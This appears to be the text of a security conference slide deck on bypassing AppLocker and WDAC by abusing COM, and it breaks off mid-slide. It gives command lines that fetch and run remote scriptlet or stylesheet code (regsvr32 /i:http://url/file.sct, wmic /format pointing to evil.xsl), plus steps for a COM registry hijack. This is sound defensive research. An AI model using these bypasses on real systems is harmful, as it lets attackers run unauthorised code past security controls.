CIRCUMVENTING APPLICATION COM UNDER CONTROL SOLUTIONS THE RADAR Figure: Game Icons [1] > Whoami ◦ Jimmy Bayne | @bohops ◦ Security Assessor & Researcher @ByLightLLC ◦ From Baltimore, MD area ◦ Towson University Alum ◦ First BSides Talk ◦ Community Projects ◦ Blog | bohops.com ◦ LOLBAS | lolbas-project.github.io Figure: Global Dispatch [2] > Agenda ◦ COM Overview ◦ Application Control Overview ◦ Application Control Bypasses ◦ Defensive Considerations …ready…set…go! > COM Overview What is COM? ◦ COM = Component Object Model ◦ A binary interface for software interoperability ◦ Facilitates function calls between components (Middleware) [1] ◦ Technologies – DCOM, OLE, Automation, ActiveX Controls, etc. Terminology ◦ Interface: A definition for exposing COM functionality, including methods and properties ◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2] ◦ Object (Component): An instance of a COM class ◦ Instantiation: The creation or activation of an object (instance) [1] https://www.cs.umd.edu/~pugh/com/ [2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids > COM Overview Registered COM ◦ Registry keys direct the activation of COM objects ◦ COM class data is located in the HKCR Registry hive ◦ The data is merged from the \Software\Classes keys of the HKLM and HKCU hives ◦ Key Values in HKCU take precedence over values in HKLM ◦ Notable key structure in HKCR\CLSID\ ◦ CLSID – Class Identifier ({GUID} Format) ◦ InprocServer32 – In Process Server COM Server Implementation (DLL, OCX) ◦ LocalServer32 – Out-of-Process COM Server Implementation (EXE) ◦ ProgID/VersionIndependentProgID – COM class object friendly name *Note: There are other interesting keys as well > COM Overview Registered COM COM Class ID {CLSID} COM Server In Process Server Binary Path COM Object Programmatic Friendly Name Identifiers > COM Overview COM Example: COM Object Instantiation “Version Independent” ProgID Friendly Name Interface ID (IID) [IWshShell3 Interface] IWshShell3 Interface Methods & Properties Exec Method Call > COM Overview COM Abuse Vectors ◦ Active Scripting ◦ Script Engines (Languages) – Jscript, VBScript ◦ Script Hosts – (Signed) Binaries that execute script code ◦ ‘Facilitators’ – (Signed) Binaries that ‘enable’ script host-code execution (e.g. lolbins) ◦ PowerShell • COM Functionality • Registration • Resolution • Features/Capabilities > COM Resources James Forshaw (@tiraniddo) Matt Nelson (@enigma0x3) Rob Maslen (@rbmaslen) Casey Smith (@subTee) https://www.youtube.com/watch?v=dfMuzAZRGm4 https://www.youtube.com/watch?v=3gz1QmiMhss https://www.youtube.com/watch?v=xmbjRP5W-yk Source: Natty Boh Gear [5] > Application Control Overview Application Control is the practice of restricting unauthorized code execution Approaches ◦ Whitelists ◦ Blocklists ◦ Hybrid Application Control ≈ Application Whitelisting (AWL) Two major Microsoft solutions ◦ AppLocker ◦ WDAC (Device Guard) Figure: Wikipedia [4] > AppLocker ◦ Available since Windows 2008 Server & Windows 7 Enterprise ◦ Configured through Group Policy ◦ Supported Modes: Enforcement & Audit ◦ Rule Collections: Executable, Installer, Scripts, Packages, DLLs ◦ Rule Conditions: File Hash, Path, & Publisher ◦ Default Rules - Enforced Configuration ◦ Built-In option for setting baseline rule set ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [-] Not code integrity aware ◦ [-] Not considered a security boundary ◦ [+] Less overhead to implement > WDAC ◦ Available since Windows 2016 Server & Windows 10 Enterprise ◦ Configured through PowerShell cmdlets ◦ Supported Modes: Enforcement & Audit ◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc. ◦ Default Rules - Enforced Configuration ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [+] Code integrity aware (UMCI) ◦ [+] Considered a security boundary ◦ [-] More administrative overhead (maybe…) > PowerShell ◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs) ◦ COM object support (e.g. new-object cmdlet) ◦ Great for Dev/IT Management ◦ (Not so) Great for hackers and Red Teams ◦ PowerShell Version 5(.1) Enhancements ◦ Detection optics (when enabled) ◦ Script block logging, module logging, and transcription ◦ Constrained Language Mode (CLM) support ◦ Restricts sensitive language elements Source: Wiki Media [6] ◦ Not a security boundary ◦ “Implementation” determines effectiveness > COM: Circumventing AppLocker ◦ Default Rules ◦ Gaps in Path rules allow for the execution of any script or executable ◦ Unprivileged users can “write to” interesting paths Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0 > COM: Circumventing AppLocker ◦ 50 Shades of Squiblydoo ◦ Most variants abuse COM/DLL Registration ◦ Leverages scriptlet component files (.sct) and the script(let) run-time component (scrobj.dll) ◦ Component files can create objects and run unsigned script code Scriptlet Component File (“sct”) Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/RegSvr32.sct > COM: Circumventing AppLocker 50 Shades of Squiblydoo (Examples) ◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll ◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct ◦ cmstp.exe /s file.inf ◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1, ◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\path to file.inf Credits Casey Smith (@subTee) Matt Nelson (@enigma0x3) Nick Tyrer (@NickTyrer) Kyle Hanslovan (@KyleHanslovan) > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) ◦ Intended for transforming XML docs into other outputs ◦ Under the hood, variant technique abuses MSXML COM objects (interface methods and properties) ◦ XML Transform functions can execute embedded script code > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) wmic process get /format:”https://example.com/evil.xsl” http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html (Credit: Casey Smith - @subTee) > COM: Circumventing AppLocker PowerShell CLM ◦ CLM restricts unapproved script execution, cmdlets, arbitrary types, type definitions, etc. ◦ However, the new-object cmdlet can instantiate COM objects under AppLocker “enforcement” ◦ Example: PowerShell XML Stylesheet Transform > AppLocker Resources Adam Chester (@_xpn_) Oddvar Moe (@Oddvarmoe) https://blog.xpnsec.com/constrained-language-mode-bypass/ https://www.youtube.com/watch?v=zw21CbNeAjA > COM: Circumventing WDAC Windows Lockdown Policy (WLDP) • is activated when WDAC enforces a code integrity policy (UMCI = Enabled) • is included with “enlightened” script hosts and engines (as wldp.dll) • exports a function called WldpIsClassInApprovedList(), which is called to validate if a CLSID is safe • facilitates the instantiation of a COM (class) object if deemed safe Potential COM WDAC Bypass Conditions • Discovering script hosts that are not WLDP enlightened • Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code • Discovering script host/engine WLDP code implementation flaws for evading WldpIsClassInApprovedList() (e.g. false reliance/oversight) • Discovering ‘unsafe’ COM objects that are in the approved list • Re-introducing old code that is still trusted > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible: ◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting.. Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/ > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ A review of the exposed methods revealed various transform* functions > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass ◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM com object could no longer be used to execute scriptlet code under the WDAC policy ◦ Microsoft patched and released a new MSXML3.dll (the COM server) > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay ◦ For testing, a few versions of previous MSXML3.dll (and dependency) files were copied to the new WDAC test machine. ◦ Interestingly, a previous unpatched DLLs of the same Microsoft build series was still digitally signed > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ A deeper look into the signature properties confirmed that it was catalog signed as well as revealed the path of the catalog file > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ For testing, the COM Class Registry Keys from HKLM was exported to a .reg file for COM Key Hijacking ◦ Modifications were made for HKCU and the InprocServer32 path to point to the ‘legacy’ binary > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged with HKCR > COM: Circumventing WDAC AWL Bypass: Catalog Signature Hygiene ◦ Sure enough, a replay